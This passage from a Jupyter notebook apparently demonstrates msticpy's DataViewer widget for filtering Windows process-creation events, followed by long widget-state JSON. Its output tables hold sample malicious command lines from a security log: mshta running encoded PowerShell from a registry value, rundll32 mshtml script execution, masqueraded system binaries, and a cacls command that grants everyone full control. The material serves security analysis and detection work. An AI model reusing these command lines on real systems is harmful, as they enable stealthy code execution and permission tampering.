":\"1812\",\"type\":\"BooleanFilter\"},{\"attributes\":{\"editor\":{\"id\":\"1904\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1903\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1805\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1910\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1909\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1808\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1905\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1900\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1901\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1906\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1902\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1897\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1904\",\"type\":\"StringEditor\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1809\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1908\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1907\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1807\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1906\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1905\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1806\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1909\",\"type\":\"StringFormatter\"}],\"root_ids\":[\"1801\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n var render_items = [{\"docid\":\"64015a85-dd87-47e6-a6eb-8974bf509dca\",\"notebook_comms_target\":\"1911\",\"root_ids\":[\"1801\"],\"roots\":{\"1801\":\"277f4152-464f-468f-a691-b8b365abe662\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n var attempts = 0;\n var timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1801" } }, "output_type": "display_data" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "c36a852fa7dd4469bed195022bcedcba", "version_major": 2, "version_minor": 0 }, "text/plain": [ "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "viewer = DataViewer(data, selected_cols=columns)\n", "\n", "sample_q_filter = {\n", " \"EventID query 'ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))'\": (\n", " \"EventID\",\n", " False,\n", " \"query\",\n", " \"ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))\",\n", " )\n", "}\n", "viewer.import_filters(sample_q_filter)\n", "# We're opening the \"Choose columns\" drop-down programmatically\n", "# Just click on the small arrow to the left of \"Choose columns\" to open this\n", "viewer.accordion.selected_index = 1\n", "viewer" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Accessing the filtered data\n", "\n", "Use the `filtered_data` property of the DataViewer to retrieve\n", "a DataFrame corresponding to the current column and row filtering.\n", "\n", "> Note column sorting is not captured in this data." ] }, { "cell_type": "code", "execution_count": 9, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
AccountEventIDTimeGeneratedComputerNewProcessNameCommandLineParentProcessName
58MSTICAlertsWin1\\MSTICAdmin46882019-01-15 05:15:16.663MSTICAlertsWin1C:\\Diagnostics\\UserTmp\\rundll32.exe.\\rundll32.exe /C mshtml,RunHTMLApplication j...C:\\Windows\\System32\\cmd.exe
162MSTICAlertsWin1\\MSTICAdmin46882019-01-15 05:15:16.020MSTICAlertsWin1C:\\Diagnostics\\UserTmp\\cmd.execmd /c C:\\Windows\\System32\\mshta.exe vbscript...C:\\Windows\\System32\\cmd.exe
176MSTICAlertsWin1\\MSTICAdmin46882019-01-15 05:15:18.080MSTICAlertsWin1C:\\Diagnostics\\UserTmp\\wuauclt.exe.\\wuauclt.exe /C \"c:\\windows\\softwaredistribu...C:\\Windows\\System32\\cmd.exe
190MSTICAlertsWin1\\MSTICAdmin46882019-01-15 05:15:18.287MSTICAlertsWin1C:\\Diagnostics\\UserTmp\\lsass.exe.\\lsass.exe /C \"c:\\windows\\softwaredistributi...C:\\Windows\\System32\\cmd.exe
193MSTICAlertsWin1\\MSTICAdmin46882019-01-15 05:15:18.337MSTICAlertsWin1C:\\Diagnostics\\UserTmp\\cmd.execmd /c \"powershell wscript.shell used to down...C:\\Windows\\System32\\cmd.exe
194MSTICAlertsWin1\\MSTICAdmin46882019-01-15 05:15:18.403MSTICAlertsWin1C:\\Diagnostics\\UserTmp\\cacls.execacls.exe c:\\windows\\system32\\wscript.exe /e ...C:\\Windows\\System32\\cmd.exe
203MSTICAlertsWin1\\MSTICAdmin46882019-01-15 05:15:18.820MSTICAlertsWin1C:\\Diagnostics\\UserTmp\\cmd.execmd /c echo /e:vbscript.encode /bC:\\Windows\\System32\\cmd.exe
\n", "
" ], "text/plain": [ " Account EventID TimeGenerated \\\n", "58 MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:16.663 \n", "162 MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:16.020 \n", "176 MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.080 \n", "190 MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.287 \n", "193 MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.337 \n", "194 MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.403 \n", "203 MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.820 \n", "\n", " Computer NewProcessName \\\n", "58 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\rundll32.exe \n", "162 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cmd.exe \n", "176 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\wuauclt.exe \n", "190 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\lsass.exe \n", "193 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cmd.exe \n", "194 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cacls.exe \n", "203 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cmd.exe \n", "\n", " CommandLine \\\n", "58 .\\rundll32.exe /C mshtml,RunHTMLApplication j... \n", "162 cmd /c C:\\Windows\\System32\\mshta.exe vbscript... \n", "176 .\\wuauclt.exe /C \"c:\\windows\\softwaredistribu... \n", "190 .\\lsass.exe /C \"c:\\windows\\softwaredistributi... \n", "193 cmd /c \"powershell wscript.shell used to down... \n", "194 cacls.exe c:\\windows\\system32\\wscript.exe /e ... \n", "203 cmd /c echo /e:vbscript.encode /b \n", "\n", " ParentProcessName \n", "58 C:\\Windows\\System32\\cmd.exe \n", "162 C:\\Windows\\System32\\cmd.exe \n", "176 C:\\Windows\\System32\\cmd.exe \n", "190 C:\\Windows\\System32\\cmd.exe \n", "193 C:\\Windows\\System32\\cmd.exe \n", "194 C:\\Windows\\System32\\cmd.exe \n", "203 C:\\Windows\\System32\\cmd.exe " ] }, "execution_count": 9, "metadata": {}, "output_type": "execute_result" } ], "source": [ "viewer.filtered_data" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# DataViewer Help" ] }, { "cell_type": "code", "execution_count": 10, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Help on class DataViewer in module msticpy.nbtools.data_viewer:\n", "\n", "class DataViewer(builtins.object)\n", " | DataViewer(data: pandas.core.frame.DataFrame, selected_cols: List[str] = None, debug=False)\n", " | \n", " | Data viewer class.\n", " | \n", " | Methods defined here:\n", " | \n", " | __init__(self, data: pandas.core.frame.DataFrame, selected_cols: List[str] = None, debug=False)\n", " | Initialize the DataViewer class.\n", " | \n", " | Parameters\n", " | ----------\n", " | data : pd.DataFrame\n", " | The DataFrame to view\n", " | selected_cols : List[str], optional\n", " | Initial subset of columns to show, by default None (all cols)\n", " | debug : bool\n", " | Output additional debugging info to std out.\n", " | \n", " | display(self)\n", " | Display the widget.\n", " | \n", " | import_filters(self, filters: Dict[str, msticpy.nbtools.data_viewer.FilterExpr])\n", " | Import filter set replacing current filters.\n", " | \n", " | Parameters\n", " | ----------\n", " | filters : Dict[str, FilterExpr]\n", " | dict of filter name, FilterExpr\n", " | FilterExpr is a tuple of:\n", " | column [str], inv [bool], operator [str], expr [str]\n", " | \n", " | show(self)\n", " | Display the data table control.\n", " | \n", " | ----------------------------------------------------------------------\n", " | Data descriptors defined here:\n", " | \n", " | __dict__\n", " | dictionary for instance variables (if defined)\n", " | \n", " | __weakref__\n", " | list of weak references to the object (if defined)\n", " | \n", " | filtered_data\n", " | Return filtered dataframe.\n", " | \n", " | filters\n", " | Return current filters as a dict.\n", "\n" ] } ], "source": [ "help(DataViewer)" ] }, { "cell_type": "code", "execution_count": 11, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "========================== ========= ========================== =============== =================================== ===================================================================================================================================================================================================================================== ===========================\n", "Account EventID TimeGenerated Computer NewProcessName CommandLine ParentProcessName\n", "========================== ========= ========================== =============== =================================== ===================================================================================================================================================================================================================================== ===========================\n", "MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:16.663000 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\rundll32.exe .\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!) C:\\Windows\\System32\\cmd.exe\n", "MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:16.020000 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cmd.exe cmd /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.exe -c \"\"$x=$((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion Certificate).Certificate);.\\powershell -E $y\"\"\",0,True)(window.close) C:\\Windows\\System32\\cmd.exe\n", "MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.080000 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\wuauclt.exe .\\wuauclt.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" C:\\Windows\\System32\\cmd.exe\n", "MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.287000 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\lsass.exe .\\lsass.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" C:\\Windows\\System32\\cmd.exe\n", "MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.337000 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cmd.exe cmd /c \"powershell wscript.shell used to download a .gif\" C:\\Windows\\System32\\cmd.exe\n", "MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.403000 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cacls.exe cacls.exe c:\\windows\\system32\\wscript.exe /e /t /g everyone:f C:\\Windows\\System32\\cmd.exe\n", "MSTICAlertsWin1\\MSTICAdmin 4688 2019-01-15 05:15:18.820000 MSTICAlertsWin1 C:\\Diagnostics\\UserTmp\\cmd.exe cmd /c echo /e:vbscript.encode /b C:\\Windows\\System32\\cmd.exe\n", "========================== ========= ========================== =============== =================================== ===================================================================================================================================================================================================================================== ===========================\n" ] } ], "source": [ "import tabulate\n", "print(tabulate.tabulate(viewer.filtered_data, tablefmt=\"rst\", showindex=False, headers=\"keys\"))" ] } ], "metadata": { "kernelspec": { "display_name": "Python (condadev)", "language": "python", "name": "condadev" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.7.10" }, "widgets": { "application/vnd.jupyter.widget-state+json": { "state": { "007afbb0564c460386581a0c37f92acc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Clear all filters", "layout": "IPY_MODEL_0d64314ec34e4a2f92ddfe414a23ee1e", "style": "IPY_MODEL_c95fc31b16f740f7881c833b80dc0ff6" } }, "01b4914177cb4ea588ff91eb73cb18d2": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "01ceaecf10814b35a94144766cb7ca53": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "01e9b5b9e2f948f8b02f10bd0e2d2581": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "0354b7441ac24daaaaed54717c3d29ca": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "0468790673594a8daa18a9805bf3db84": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "04899dd06bc14392a9e48b80cad6f8f6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "70%" } }, "04ff5b81dc504d3b98f6e052da918363": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_388666284cd2420d82603b3470fb3569", "IPY_MODEL_d840b505fd474fc587b39b8624adf0bf" ], "layout": "IPY_MODEL_4b4df991eb764acba40c4005635698cc" } }, "051ad9f6b3e941e996df3e4b7dd5a3c3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_9062d54a43f14eff95ada0765412d70c", "IPY_MODEL_9414237db4a44f64833c7e9743a5d522", "IPY_MODEL_e2328c04c2de42f989a5029717800568", "IPY_MODEL_7059d69c5ec4412aa91247741509c2be" ], "layout": "IPY_MODEL_ef0ff907f7944bf0995004e685b6309e" } }, "053405d2adb34f11a7a8e696006a0ba9": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "200px", "width": "40%" } }, "05819ecfa0a84cb6bc1da256ad6b2806": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_6db387e0ce73474ebbc9b81d9a6b65cc", "IPY_MODEL_0f2cdd95ce36432bb5568c1cd517d194" ], "layout": "IPY_MODEL_f49a1b720a034428aeaf34e514aea0a8" } }, "06248439df564c268fb7ad0e58f35808": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "077317f3b9dc4febacc1ec8a17237f44": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "08852b76afe74c028723879733117fdd": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply columns", "layout": "IPY_MODEL_b6b48710a238432db8fbc85f95d965c8", "style": "IPY_MODEL_75aaf991c6b74e658fa302082b2b9ccb" } }, "0967ee4b00824fb984366a39c0c73f13": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "09c5521bc8ca478b8ca2930b32c2f6f3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "==", "contains", "matches", "in", "between", "query" ], "index": 1, "layout": "IPY_MODEL_b331bba272ed438aa05e46dddfea7cdb", "style": "IPY_MODEL_5edf1b17f727492681224d545bbdc9da" } }, "09f33472219641b89332f93f49ed773f": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply columns", "layout": "IPY_MODEL_edc7b60605b14803a11f32010de9f9dd", "style": "IPY_MODEL_92d6d1021cab4afc82932377c5826a57" } }, "0a721017793d455a820c6aeaf902ff33": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "0aae3189ccb6445b88597d671659fe81": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "0b1aad3a831b4a57ab9463d831a3c630": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Clear all filters", "layout": "IPY_MODEL_eb3dc04670bd49e5a34fadf671232fb0", "style": "IPY_MODEL_73d4b2b7a2004f4dab1647763895ad11" } }, "0b50cc97034944ca87ec5c6d415ad132": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_97a4e6e8b84e4da4b43cf9888aad5c47", "style": "IPY_MODEL_f5f1db4d825c4c669f6c4b75ceaa636d", "value": "Enter multiple values separated by commas. Strings do not need quotes." } }, "0b5205cdc4a14e4bba53cd6c04d3bf17": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "0c442da2b2b94765ba2116badd5ed9a3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "description": "Filters", "index": null, "layout": "IPY_MODEL_dacfd3a9a0b34000bae4e67a85ca250a", "style": "IPY_MODEL_8450c56dd9974440a252629859e30d02" } }, "0d64314ec34e4a2f92ddfe414a23ee1e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "0d905ec2606940e787eca46cade1ab9d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_5ecb8ec617804e2a9b295945d98f680d", "style": "IPY_MODEL_c541a659ef5247de88274ce099e211cc", "value": "Current filters" } }, "0dbc6f3f4b5c4b5bb4cd2158eac7abcc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "0e6ce2977dbb4f9399699b3d650b23fb": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "0f2cdd95ce36432bb5568c1cd517d194": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_f89dd23f69274462bbc7cf9024d352e6", "IPY_MODEL_99ed9f340e444401a3934a1451bb3171" ], "layout": "IPY_MODEL_b572c2e3d2f94056b6260ceb71ad4dea" } }, "0f6cd28d4dc44a54be10c3bb6488a283": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "400px" } }, "0f78cf60c57442c7962936dc5129fb1f": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_3828cc1ef0af4a358e7206ac8d36c8d2", "IPY_MODEL_ecc9cf108d494c27b2e982c04e75b1e6" ], "layout": "IPY_MODEL_e6db1929109d48c19ca8b42095c4496d" } }, "0ff353fb41fd4ed58826f9effa2b5a18": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "101d71758b3643e8bb9816ed822c0cb5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove All", "layout": "IPY_MODEL_0aae3189ccb6445b88597d671659fe81", "style": "IPY_MODEL_9ac351b5363b475496c518e770afbce3" } }, "1032768376944459aa3e6c70a39123b6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "10d96dd974f54d1a8e5a94cb9c03872e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_74fa9c71b0ec481a922dc864621ad54a", "IPY_MODEL_883e0693211d44a7ad0cce63566515de", "IPY_MODEL_e9a364d8356242eaa460bfc61f58ce75", "IPY_MODEL_101d71758b3643e8bb9816ed822c0cb5" ], "layout": "IPY_MODEL_67c2936988ff41e08c935ba701768ea6" } }, "1109323aa29e47dbac0b7a6a6d5beebe": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_4c01a47b27504cea84eef56487622669", "IPY_MODEL_429fedb43a7b4c478379bd3a66cb4e5a" ], "layout": "IPY_MODEL_e51b0aa5262c45bc9f1f3a6e3313d219" } }, "112807c16f29483db116dcc6531c553a": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "11bad756849940df861619ee57f54ae8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "123640ba0cea4f9da968315244f625be": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "12c5358443bc48ce898a4ea5e2ef6ce6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "500px" } }, "132d4edf36b448dda4431b86ba240ba0": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "500px" } }, "149e2438969e45ffb316dc970456d1fb": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_0d905ec2606940e787eca46cade1ab9d", "IPY_MODEL_9d64ba523a704ed49b41651fde3f2148" ], "layout": "IPY_MODEL_c637944b7f694ee3a2339c345f1fd0d2" } }, "14a80d2034dc455a86e1897441d0ea8b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_e847652e2c8a45cab0ad278a6c880a08", "style": "IPY_MODEL_6c1f75ab44ac489a9fc4fdc265de7c60", "value": " in " } }, "14bdab08f5eb4ebf8d9ea4402abda2c2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "15262870d1d84a4c9b31e8807e84e02e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "15b94024ea40418dbaa8c53373332424": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "200px" } }, "160638c038d04834a03e8cc1e8e788a4": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "100px" } }, "169037276db6452cb2ef539bbfcd13cd": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "16d5d38a9798409d823cbb317fbe14e9": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "16f06a96b3b84861bc8fcdc521a9a9fc": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "17233af7114e4bbfad0a662e1f42a1d3": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "70%" } }, "1754cc6735a642c99c80ea50b3f23387": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "18cced5f4a4e4e8c8be1b41f2dacef1c": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "400px" } }, "196f6de2919a488d885de432efd68bff": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_88d5c49ce3144a1d90912d1b4e0e8f35", "style": "IPY_MODEL_8152896ed99a4cc6b948ea9e1cf1d5b1", "value": "Enter multiple values separated by commas. Strings do not need quotes." } }, "1989835689bb409f965c7a52b25af959": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_de973b84536943298f7fe5800bc3a62c", "IPY_MODEL_77aeec9a3f0b4bf99eefad77b1f68dec" ], "layout": "IPY_MODEL_9b49bd4fde5f4b15a5b42e1b3c69f462" } }, "199b9d5bf65c4041ab9d98dc20746b07": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "1a44a4cf9c8b4dc382a8d021466c0d18": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "1d0daf94ee134e1b903ad364e730b934": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add filter", "layout": "IPY_MODEL_b20c9970a8e948678ca47947e7aaf675", "style": "IPY_MODEL_37df403e4e3e4e1a80281eff814ee2ea" } }, "1d25bec5fe57403d9fc4f20d2ff333d3": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "1de3a3299e984809933af7b33deca16d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "1df078ffdbf340d2b70640a33b365c62": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "100px" } }, "1ed4e7117a7a46439348eef4ba7f228b": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "1f53b3b0af94423f8d1e6e651d13a739": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_6b033d15e10549ca90024f3f548d9c90", "IPY_MODEL_a2111a9ba8b346f9a740669cf247d8e2", "IPY_MODEL_149e2438969e45ffb316dc970456d1fb", "IPY_MODEL_924757853d714e4d9379bf5ea0401e62" ], "layout": "IPY_MODEL_0967ee4b00824fb984366a39c0c73f13" } }, "202bb3e71e2f4283a216400f17f82edc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "description": "Filters", "index": null, "layout": "IPY_MODEL_12c5358443bc48ce898a4ea5e2ef6ce6", "style": "IPY_MODEL_de89b5b8886a4db3837487d3aa14dd24" } }, "2045bb0b47b740679b00453bbb43fe43": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_3ee645fa3a97487e8ce033b176c49dfd", "IPY_MODEL_825dae91b7d944c18fed6802e8b4d2d8", "IPY_MODEL_69b8bf72d11e4859b7a35c099b850558", "IPY_MODEL_da88bfbd6a1041e18d934e1b94c84e28" ], "layout": "IPY_MODEL_a479941a224240568cf7ab9faac9bcaa" } }, "20dbae8cc26a401b99329ae9f19bfbef": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Delete filter", "layout": "IPY_MODEL_6a2925f0bd3e47dfb77c59fc9daf38e1", "style": "IPY_MODEL_5ecf764ff60340b793e302414cd0a417" } }, "2226ad09a3aa41d88d09d86d778a4e33": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_b06563bf165b41d3ad44fd83ca53cb6a", "style": "IPY_MODEL_c1e8284393ce49e1b68064a05e0821ec" } }, "2356f1cfb7f14639aa485a76c074a82b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "239c5c522a0c491f8ec97c7b46a3ca73": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "23a39ea52cdd48278e671f3d57a160cc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "23b18ed0935441fbad438828933dccc2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "2400b101ec914497b73951fbe1c94fad": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "400px" } }, 